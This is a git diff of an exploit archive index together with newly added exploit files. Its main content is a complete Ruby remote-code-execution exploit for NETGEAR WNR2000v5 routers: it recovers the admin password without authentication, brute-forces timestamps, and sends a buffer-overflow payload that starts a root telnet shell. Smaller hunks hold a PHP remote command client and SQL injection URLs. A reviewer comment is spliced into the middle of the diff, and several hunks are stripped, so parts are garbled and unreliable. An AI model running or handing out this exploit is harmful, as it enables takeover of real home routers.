 32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
@@ -32219,7 +32222,7 @@ id,file,description,date,author,platform,type,port
 32204,platforms/hardware/webapps/32204.txt,"ZYXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0
 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80
-32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80
+32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80
 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80
 32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0
@@ -32780,8 +32783,8 @@ id,file,description,date,author,platform,type,port
 33237,platforms/php/webapps/33237.txt,"Joomla! Component SportFusion 0.2.x - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
 33238,platforms/php/webapps/33238.txt,"Joomla! Component JoomlaFacebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
 33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps,0
-33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0
-33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps,0
+33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps,0
+33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps,0
 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,php,webapps,0
 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0
 33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0
@@ -35658,7 +35661,7 @@ id,file,description,date,author,platform,type,port
 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
 37934,platforms/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,php,webapps,0
-37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
+37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",php,webapps,0
 37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0
 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80
 37956,platforms/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80
@@ -35790,7 +35793,7 @@ id,file,description,date,author,platform,type,port
 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0
 38171,platforms/php/webapps/38171.txt,"Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0
 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0
-38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0
+38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0
 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
 38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
@@ -36588,7 +36591,7 @@ id,file,description,date,author,platform,type,port
 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0
 40047,platforms/php/webapps/40047.txt,"Phoenix Exploit Kit - Remote Code Execution",2016-07-01,CrashBandicot,php,webapps,80
 39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-10,"Murat Yilmazlar",php,webapps,80
-39912,platforms/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (Execute SQL Query)",2016-06-10,HaHwul,php,webapps,80
+39912,platforms/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)",2016-06-10,HaHwul,php,webapps,80
 39913,platforms/php/webapps/39913.txt,"phpMyFAQ 2.9.0 - Persistent Cross-Site Scripting",2016-06-10,"Kacper Szurek",php,webapps,80
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
@@ -36901,4 +36904,4 @@ id,file,description,date,author,platform,type,port
 40939,platforms/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
 40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
 40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
-40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
+40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb
new file mode 100755
index 000000000..f61f500cb
--- /dev/null
+++ b/platforms/cgi/remote/40949.rb
@@ -0,0 +1,428 @@ +# +# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb +# +# Remote code execution in NETGEAR WNR2000v5 +# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security +# Released on 20/12/2016 +# +# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot. +# A more reliable Metasploit module will be released soon. +# +# +# TODO: +# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password) +# - finish telnetenable (get mac and send packet) +# - finish timestamp regex (?) +# - randomise payload + +require 'net/http' +require 'uri' +require 'time' + +#################### +# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c +# and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c + +TYPE_3 = 3 +BREAK_3 = 128 +DEG_3 = 31 +SEP_3 = 3 + +@randtbl = +[ + # we omit TYPE_3 from here, not needed + -1726662223, 379960547, 1735697613, 1040273694, 1313901226, + 1627687941, -179304937, -2073333483, 1780058412, -1989503057, + -615974602, 344556628, 939512070, -1249116260, 1507946756, + -812545463, 154635395, 1388815473, -1926676823, 525320961, + -1009028674, 968117788, -123449607, 1284210865, 435012392, + -2017506339, -911064859, -370259173, 1132637927, 1398500161, + -205601318, +] + +@unsafe_state = { + "fptr" => SEP_3, + "rptr" => 0, + "state" => 0, + "rand_type" => TYPE_3, + "rand_deg" => DEG_3, + "rand_sep" => SEP_3, + "end_ptr" => DEG_3 +} + +# Emulate the behaviour of C's srand +def srandom_r (seed) + state = @randtbl + if seed == 0 + seed = 1 + end + state[0] = seed + + dst = 0 + word = seed + kc = DEG_3 + for i in 1..(kc-1) + hi = word / 127773 + lo = word % 127773 + word = 16807 * lo - 2836 * hi + if (word < 0) + word += 2147483647 + end + dst += 1 + state[dst] = word + end + + @unsafe_state['fptr'] = @unsafe_state['rand_sep'] + @unsafe_state['rptr'] = 0 + + kc *= 10 
+ kc -= 1 + while (kc >= 0) + random_r + kc -= 1 + end +end + +# Emulate the behaviour of C's rand +def random_r + buf = @unsafe_state + state = buf['state'] + + fptr = buf['fptr'] + rptr = buf['rptr'] + end_ptr = buf['end_ptr'] + val = @randtbl[fptr] += @randtbl[rptr] + + result = (val >> 1) & 0x7fffffff + fptr += 1 + if (fptr >= end_ptr) + fptr = state + rptr += 1 + else + rptr += 1 + if (rptr >= end_ptr) + rptr = state + end + end + buf['fptr'] = fptr + buf['rptr'] = rptr + + result +end +##################### + +##################### +# Ruby code ported from https://github.com/insanid/netgear-telenetenable +# +def telnetenable (mac, username, password) + mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00") + username_pad = username.ljust(0x10, "\x00") + password_pad = password.ljust(0x21, "\x00") + cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00") + + md5 = Digest::MD5.new + md5.update(cleartext) + payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*') + + secret_key = "AMBIT_TELNET_ENABLE+" + password + cipher = OpenSSL::Cipher::Cipher.new("bf-ecb").send :encrypt + cipher.key_len = secret_key.length + cipher.key = secret_key + cipher.padding = 0 + binary_data = (cipher.update(payload) << cipher.final) + + binary_data.unpack('N*').pack('V*') +end +##################### + +# Do some crazyness to force Ruby to cast to a single-precision float and +# back to an integer. +# This emulates the behaviour of the soft-fp library and the float cast +# which is done at the end of Netgear's timestamp generator. +def ieee754_round (number) + [number].pack('f').unpack('f*')[0].to_i +end + + +# This is the actual algorithm used in the get_timestamp function in +# the Netgear firmware. 
+def get_timestamp(time) + srandom_r time + t0 = random_r + t1 = 0x17dc65df; + hi = (t0 * t1) >> 32; + t2 = t0 >> 31; + t3 = hi >> 23; + t3 = t3 - t2; + t4 = t3 * 0x55d4a80; + t0 = t0 - t4; + t0 = t0 + 0x989680; + + ieee754_round(t0) +end + +# Default credentials for the router +USERNAME = "admin" +PASSWORD = "password" + +def get_request(uri_str) + uri = URI.parse(uri_str) + http = Net::HTTP.new(uri.host, uri.port) + #http.set_debug_output($stdout) + request.basic_auth(USERNAME, PASSWORD) + request = Net::HTTP::Get.new(uri.request_uri) + http.request(request) +end + +def post_request(uri_str, body) + uri = URI.parse(uri_str) + header = { 'Content-Type' => 'application/x-www-form-urlencoded' } + http = Net::HTTP.new(uri.host, uri.port) + #http.set_debug_output($stdout) + request.basic_auth(USERNAME, PASSWORD) + request = Net::HTTP::Post.new(uri.request_uri, header) + request.body = body + http.request(request) +end + +def check + response = get_request("http://#{@target}/") + auth = response['WWW-Authenticate'] + if auth != nil + if auth =~ /WNR2000v5/ + puts "[+] Router is vulnerable and exploitable (WNR2000v5)." + return + elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ + puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)." + return + end + end + puts "Router is not vulnerable." +end + +def get_password + response = get_request("http://#{@target}/BRS_netgear_success.html") + if response.body =~ /var sn="([\w]*)";/ + serial = $1 + else + puts "[-]Failed to obtain serial number, bailing out..." + exit(1) + end + + # 1: send serial number + response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi", "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+") + + # 2: send answer to secret questions + response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi", \ + "submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+") + + # 3: PROFIT!!! 
+ response = get_request("http://#{@target}/passwordrecovered.cgi") + + if response.body =~ /Admin Password: (.*)<\/TD>/ + password = $1 + else + puts "[-] Failed to obtain admin password, bailing out..." + exit(1) + end + + if response.body =~ /Admin Username: (.*)<\/TD>/ + username = $1 + else + puts "[-] Failed to obtain admin username, bailing out..." + exit(1) + end + + puts "[+] Success! Got admin username #{username} and password #{password}" + return [username, password] +end + +def get_current_time + response = get_request("http://#{@target}/") + + date = response['Date'] + Time.parse(date).strftime('%s').to_i +end + +def get_auth_timestamp(mode) + if mode == "bof" + uri_str = "lang_check.html" + else + uri_str = "PWD_password.htm" + end + response = get_request(uri_str) + if response.code == 401 + # try again, might fail the first time + response = get_request(uri_str) + if response.code == 200 + if response.body =~ /timestamp=([0-9]{8})/ + $1.to_i + end + end + end +end + +def got_shell + puts "[+] Success, shell incoming!" + exec("telnet #{@target.split(':')[0]}") +end + +if ARGV.length < 2 + puts "Usage: ./netgearPwn.rb [noreboot]" + puts "\tcheck: see if the target is vulnerable" + puts "\tbof: run buffer overflow exploit on the target" + puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!" 
+ puts "\tnoreboot: optional parameter - don't force a reboot on the target" + exit(1) +end + +@target = ARGV[0] +mode = ARGV[1] + +if ARGV.length == 3 && ARGV[2] == "noreboot" + reboot = false +else + reboot = true +end + +# Maximum time differential to try +# Look 5000 seconds back for the timestamp with reboot +# 500000 with no reboot +if reboot + TIME_OFFSET = 5000 +else + TIME_OFFSET = 500000 +end + +# Increase this if you're sure the device is vulnerable and you're not getting a shell +TIME_SURPLUS = 200 + +if mode == "check" + check + exit(0) +end + +if mode == "bof" + def uri_encode (str) + "%" + str.scan(/.{2}|.+/).join("%") + end + + def calc_address (libc_base, offset) + addr = (libc_base + offset).to_s(16) + uri_encode(addr) + end + + system_offset = 0x547D0 + gadget = 0x2462C + libc_base = 0x2ab24000 + + payload = 'a' * 36 + # filler_1 + calc_address(libc_base, system_offset) + # s0 + '1111' + # s1 + '2222' + # s2 + '3333' + # s3 + calc_address(libc_base, gadget) + # gadget + 'b' * 0x40 + # filler_2 + "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload +end + +# 0: try to see if the default admin username and password are set +timestamp = get_auth_timestamp(mode) + +# 1: reboot the router to get it to generate new timestamps +if reboot and timestamp == nil + response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes") + if response.code == "200" + puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..." + sleep 120 + puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply." + sleep 60 + else + puts "[-] Failed to reboot the router. Bailing out." + exit(-1) + end + + puts "[*] Proceeding..." +end + +# 2: get the current date from the router and parse it, but only if we are not authenticated... 
+if timestamp == nil + end_time = get_current_time + if end_time <= TIME_OFFSET + start_time = 0 + else + start_time = end_time - TIME_OFFSET + end + end_time += TIME_SURPLUS + + if end_time < (TIME_SURPLUS * 7.5).to_i + end_time = (TIME_SURPLUS * 7.5).to_i + end + + puts "[+] Got time #{end_time} from router, starting exploitation attempt." + puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)." +end + +if mode == "bof" + uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp=" + body = "submit_flag=select_language&hidden_lang_avi=#{payload}" +else + uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp=" + body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2" +end + +# 3: work back from the current router time minus TIME_OFFSET +while true + for time in end_time.downto(start_time) + begin + if timestamp == nil + response = post_request(uri_str + get_timestamp(time).to_s, body) + else + response = post_request(uri_str + timestamp.to_s, body) + end + if response.code == "200" + # this only occurs in the telnet case + credentials = get_password + #telnetenable(mac, credentials[0], credentials[1]) + #sleep 5 + #got_shell + puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" + puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" 
+ exit(0) + end + rescue EOFError + if reboot + sleep 0.2 + else + # with no reboot we give the router more time to breathe + sleep 0.5 + end + begin + s = TCPSocket.new(@target.split(':')[0], 23) + s.close + got_shell + rescue Errno::ECONNREFUSED + if timestamp != nil + # this is the case where we can get an authenticated timestamp but we could not execute code + # IT SHOULD NEVER HAPPEN + # But scream and continue just in case, it means there is a bug + puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code." + puts "[*] Let's try again..." + timestamp = get_auth_timestamp + end + next + end + rescue Net::ReadTimeout + # for bof case, we land here + got_shell + end + end + if timestamp == nil + start_time = end_time - (TIME_SURPLUS * 5) + end_time = end_time + (TIME_SURPLUS * 5) + puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}" + end +end + +# If we get here then the exploit failed +puts "[-] Exploit finished. Failed to get a shell!" \ No newline at end of file diff --git a/platforms/cgi/webapps/26461.txt b/platforms/cgi/webapps/26461.txt index e107ae1d3..f74ed2219 100755 --- a/platforms/cgi/webapps/26461.txt +++ b/platforms/cgi/webapps/26461.txt @@ -14,7 +14,7 @@ document.forms[0].submit();
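Review bot: The header comment of 40949.rb names the source and author but records no affected firmware range, no advisory reference and no description of the traffic the script produces, which is what someone triaging this entry defensively needs first. From the visible code, every state-changing request goes to the unauthenticated `apply_noauth.cgi` endpoint with an 8-digit `timestamp=` value that is iterated from the router's own `Date` header, the default mode first posts `submit_flag=reboot`, and success is tested by connecting to TCP 23. I would add a header line such as `# Affected: WNR2000v5 firmware <VERSION-PLACEHOLDER>; advisory: <ADVISORY-REF-PLACEHOLDER>; observable as repeated POSTs to /apply_noauth.cgi with a changing timestamp= and a new telnet listener on 23/tcp`. The hunk is a whole new file whose lines are collapsed on this page, so the exact placement among the existing header comments is inferred.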
- +
diff --git a/platforms/cgi/webapps/26462.txt b/platforms/cgi/webapps/26462.txt index 5bb25c780..593c00d8c 100755 --- a/platforms/cgi/webapps/26462.txt +++ b/platforms/cgi/webapps/26462.txt @@ -5,7 +5,7 @@ Simple PHP Blog is prone to multiple input validation vulnerabilities. These iss An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
- +
diff --git a/platforms/php/webapps/6311.php b/platforms/php/webapps/6311.php index 90bb5700f..2770e88d8 100755 --- a/platforms/php/webapps/6311.php +++ b/platforms/php/webapps/6311.php @@ -27,7 +27,7 @@ extract($_POST);extract($_GET); print "
URL:
"; if (strlen($eval)>3){ $eval=stripslashes($eval); - print "\nEnter PHP Command:\n"; print "
"; $res=curl("$url/images/emoticons/sphp.php","z=$eval"); $res=strstr($res,"GIF89a"); @@ -76,7 +76,7 @@ if (strlen($url)>10) print "\n
Trying to Logout...";flush(); $res=curl($url."/logout.php",""); if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n

Error To Logout

\n\n\n$res"); - print "\nEnter PHP Command:\n"; } print ""; ?> diff --git a/platforms/php/webapps/6422.txt b/platforms/php/webapps/6422.txt index 1ae9270e3..ec54d2064 100755 --- a/platforms/php/webapps/6422.txt +++ b/platforms/php/webapps/6422.txt @@ -45,12 +45,12 @@ POC: - http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 + http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 http://www.site.com/search_results.php?query=[XSS] Live Demo: - http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 + http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 http://www.phpvid.com/search_results.php?query= diff --git a/platforms/php/webapps/8713.txt b/platforms/php/webapps/8713.txt index 59b5a1c57..96f46098f 100755 --- a/platforms/php/webapps/8713.txt +++ b/platforms/php/webapps/8713.txt @@ -204,7 +204,7 @@ You must know that all _GET _POST _REQUEST variables are sanizated in init.inc.p File: /include/init.inc.php // Do some cleanup in GET, POST and cookie data and un-register global vars - $HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => '''); + $HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => '''); ... $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST); diff --git a/platforms/windows/dos/40947.html b/platforms/windows/dos/40947.html new file mode 100755 index 000000000..040e4c3f8 --- /dev/null +++ b/platforms/windows/dos/40947.html @@ -0,0 +1,36 @@ + + + diff --git a/platforms/windows/dos/40948.html b/platforms/windows/dos/40948.html new file mode 100755 index 000000000..67d21d03f --- /dev/null +++ b/platforms/windows/dos/40948.html @@ -0,0 +1,64 @@ + + +